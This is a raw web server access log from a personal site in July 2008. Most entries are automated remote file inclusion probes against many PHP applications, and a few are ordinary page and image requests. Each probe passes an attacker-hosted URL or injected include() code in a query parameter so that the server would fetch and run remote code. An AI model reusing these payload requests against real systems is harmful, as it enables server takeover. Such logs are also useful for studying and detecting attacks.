204.15.10.22 - - [14/Jul/2008:11:39:37 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
204.15.10.22 - - [14/Jul/2008:11:39:37 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
65.98.70.18 - - [14/Jul/2008:11:40:05 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.hotelberberys.pl/includes/domit/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.70.18 - - [14/Jul/2008:11:40:05 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.hotelberberys.pl/includes/domit/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.3.2.99 - - [14/Jul/2008:11:40:14 -0700] "GET /logs/access_080129.log//%7Ekslim/bbs//skin/zero_vote/error.php?dir=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.3.2.99 - - [14/Jul/2008:11:40:14 -0700] "GET //%7Ekslim/bbs//skin/zero_vote/error.php?dir=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.3.2.99 - - [14/Jul/2008:11:40:14 -0700] "GET /logs//%7Ekslim/bbs//skin/zero_vote/error.php?dir=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.3.2.99 - - [14/Jul/2008:11:40:17 -0700] "GET /logs/access_071224.log//%7Ekslim/bbs//skin/zero_vote/error.php?dir=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.24.222 - - [14/Jul/2008:11:40:17 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://rotihidup.com/components/com_rss/ma???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
80.67.24.222 - - [14/Jul/2008:11:40:17 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://rotihidup.com/components/com_rss/ma???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:11:40:17 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:11:40:17 -0700] "GET /logs/access_080315.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:11:40:17 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:11:40:19 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:11:40:20 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:11:40:23 -0700] "GET /logs/access_080225.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.227.218.118 - - [14/Jul/2008:11:40:58 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://knightkittens.com/images/ma??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
216.227.218.118 - - [14/Jul/2008:11:40:58 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://knightkittens.com/images/ma??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:40:58 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:41:00 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:41:02 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:41:17 -0700] "GET //popup_window.php?site_isp_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:11:41:19 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:11:41:20 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:41:21 -0700] "GET /logs//popup_window.php?site_isp_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:41:28 -0700] "GET /logs/access_080129.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:41:58 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7735.jpg HTTP/1.1" 200 145274 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:42:03 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.182.104.24 - - [14/Jul/2008:11:42:04 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7743.jpg HTTP/1.1" 200 152453 "http://www.dmulk.com/bikes/dteel/2008_02_16/Arryo_Seco/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:11:42:18 -0700] "GET /logs/access.log/players-detail.php?id=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.56.49 - - [14/Jul/2008:11:42:28 -0700] "GET /errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.70.36.107 - - [14/Jul/2008:11:42:31 -0700] "GET /logs/access.log/errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [14/Jul/2008:11:42:31 -0700] "GET /errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [14/Jul/2008:11:42:31 -0700] "GET /logs/errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:42:36 -0700] "GET /logs/access_080315.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:11:42:36 -0700] "GET /index.php?go1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 500 374 "-" "libwww-perl/5.79" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:42:39 -0700] "GET /logs/access_080129.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:11:42:40 -0700] "GET /index.php?go1=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 500 374 "-" "libwww-perl/5.79" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:42:41 -0700] "GET /logs/access_080315.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.70.36.107 - - [14/Jul/2008:11:42:43 -0700] "GET /logs/errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [14/Jul/2008:11:42:43 -0700] "GET /errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:43:30 -0700] "GET /logs/access_080313.log//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:11:44:49 -0700] "GET /logs/access_080313.log//calendar.php?p=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:11:44:49 -0700] "GET /logs/access_080313.log//calendar.php?p=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.174.134.2 - - [14/Jul/2008:11:44:55 -0700] "GET / HTTP/1.1" 200 18257 "http://forums.off-road.com/jeep-short-wheelbase/162537-amc-jeep-cj10a-aircraft-tug-have-questions.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:11:44:57 -0700] "GET /logs/access_080322.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.24.222 - - [14/Jul/2008:11:44:58 -0700] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rotihidup.com/components/com_rss/ma???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
80.67.24.222 - - [14/Jul/2008:11:44:58 -0700] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://rotihidup.com/components/com_rss/ma???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:45:26 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:45:26 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:45:26 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:11:45:54 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:11:45:55 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.101.24 - - [14/Jul/2008:11:46:00 -0700] "GET /logs/errors.php?error=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [14/Jul/2008:11:46:00 -0700] "GET /errors.php?error=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.3.2.99 - - [14/Jul/2008:11:46:15 -0700] "GET /logs/access_080129.log//%7Ekslim/bbs//skin/zero_vote/error.php?dir=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.3.2.99 - - [14/Jul/2008:11:46:15 -0700] "GET //%7Ekslim/bbs//skin/zero_vote/error.php?dir=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.3.2.99 - - [14/Jul/2008:11:46:16 -0700] "GET /logs//%7Ekslim/bbs//skin/zero_vote/error.php?dir=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.3.2.99 - - [14/Jul/2008:11:46:18 -0700] "GET /logs/access_071224.log//%7Ekslim/bbs//skin/zero_vote/error.php?dir=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:46:53 -0700] "GET /logs/access_080128.log//modules/My_eGallery/index.php?basepath=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:11:46:54 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:11:46:54 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.91.241.172 - - [14/Jul/2008:11:46:55 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.227.218.118 - - [14/Jul/2008:11:47:05 -0700] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://knightkittens.com/images/ma??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
216.227.218.118 - - [14/Jul/2008:11:47:05 -0700] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://knightkittens.com/images/ma??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
65.55.211.21 - - [14/Jul/2008:11:47:07 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.21 - - [14/Jul/2008:11:47:09 -0700] "GET /?N=A&show=slide&pageid=159 HTTP/1.1" 200 37845 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
87.101.4.49 - - [14/Jul/2008:11:47:26 -0700] "GET /logs//theme.php?THEME_DIR=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [14/Jul/2008:11:47:27 -0700] "GET //theme.php?THEME_DIR=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.216.211.113 - - [14/Jul/2008:11:47:28 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" "www.dmulk.com"
64.22.89.194 - - [14/Jul/2008:11:47:42 -0700] "GET /logs//modules/Forums/admin/errors.php?error=http://co.nnect.net/cache/i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [14/Jul/2008:11:47:42 -0700] "GET //modules/Forums/admin/errors.php?error=http://co.nnect.net/cache/i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:47:43 -0700] "GET /logs/access_080110.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.49 - - [14/Jul/2008:11:47:49 -0700] "GET /logs/access_071225.log//theme.php?THEME_DIR=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [14/Jul/2008:11:47:49 -0700] "GET //theme.php?THEME_DIR=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [14/Jul/2008:11:47:50 -0700] "GET /logs//theme.php?THEME_DIR=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.34.140.215 - - [14/Jul/2008:11:47:59 -0700] "GET /logs/errors.php?error=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [14/Jul/2008:11:47:59 -0700] "GET /errors.php?error=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.101.4.49 - - [14/Jul/2008:11:48:00 -0700] "GET /logs/access_071218.log//theme.php?THEME_DIR=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.80.193.41 - - [14/Jul/2008:11:48:10 -0700] "GET / HTTP/1.0" 200 18237 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; Media Center PC 4.0)" "dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:48:11 -0700] "GET /logs/access_071225.log//include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:48:11 -0700] "GET //include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:48:12 -0700] "GET /logs//include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.228.120 - - [14/Jul/2008:11:48:20 -0700] "GET /logs/port.php?content=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.203.228.120 - - [14/Jul/2008:11:48:20 -0700] "GET /port.php?content=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:48:22 -0700] "GET /logs/access_080207.log//include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.216.211.113 - - [14/Jul/2008:11:49:03 -0700] "GET /bikes/Picture051.avi HTTP/1.1" 200 15678320 "http://www.st-owners.com/forums/showthread.php?t=43885" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" "www.dmulk.com"
80.67.24.222 - - [14/Jul/2008:11:49:09 -0700] "GET //components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://rotihidup.com/components/com_rss/ma???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
80.67.24.222 - - [14/Jul/2008:11:49:09 -0700] "GET /logs//components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://rotihidup.com/components/com_rss/ma???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
69.57.189.226 - - [14/Jul/2008:11:49:19 -0700] "GET /logs/access_080212.log/doceboLms/class/class.dashboard_lms.php?where_framework=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:49:33 -0700] "GET /logs/access.log/errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:49:34 -0700] "GET /errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:49:34 -0700] "GET /logs/errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.29.107 - - [14/Jul/2008:11:50:10 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://cusenza.altervista.org/id.txt? HTTP/1.1" 200 18499 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.70.164 - - [14/Jul/2008:11:51:08 -0700] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.lisey.ca/sohoadmin/save.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.164 - - [14/Jul/2008:11:51:08 -0700] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.lisey.ca/sohoadmin/save.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:11:51:15 -0700] "GET /logs/access_080129.log//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:11:51:19 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:11:51:20 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:11:51:41 -0700] "GET /logs/access_071225.log//include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:11:51:42 -0700] "GET //include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:51:44 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:11:51:45 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:51:47 -0700] "GET /logs//include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:51:48 -0700] "GET //include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.26 - - [14/Jul/2008:11:52:33 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.26 - - [14/Jul/2008:11:52:33 -0700] "GET /minamijewelry/source_images/batch1/?N=D HTTP/1.1" 200 5032 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:52:47 -0700] "GET /logs/access.log//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:52:47 -0700] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:11:52:48 -0700] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.23.18 - - [14/Jul/2008:11:53:07 -0700] "GET /logs/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://cabinet-chapuis.info/graphisme/images/idpoi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [14/Jul/2008:11:53:07 -0700] "GET /plugins/safehtml/HTMLSax3.php?dir[plugins]=http://cabinet-chapuis.info/graphisme/images/idpoi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.23.18 - - [14/Jul/2008:11:53:07 -0700] "GET /logs/access.log/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://cabinet-chapuis.info/graphisme/images/idpoi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:11:53:17 -0700] "GET /logs/access_071224.log/index.php?pageurl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [14/Jul/2008:11:53:18 -0700] "GET /logs/access_071224.log/index.php?pageurl=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:11:53:21 -0700] "GET /logs//include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:11:53:22 -0700] "GET //include/write.php?dir=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.182.191.60 - - [14/Jul/2008:11:53:24 -0700] "GET /logs/access.log/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://cabinet-chapuis.info/graphisme/images/idpoi.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
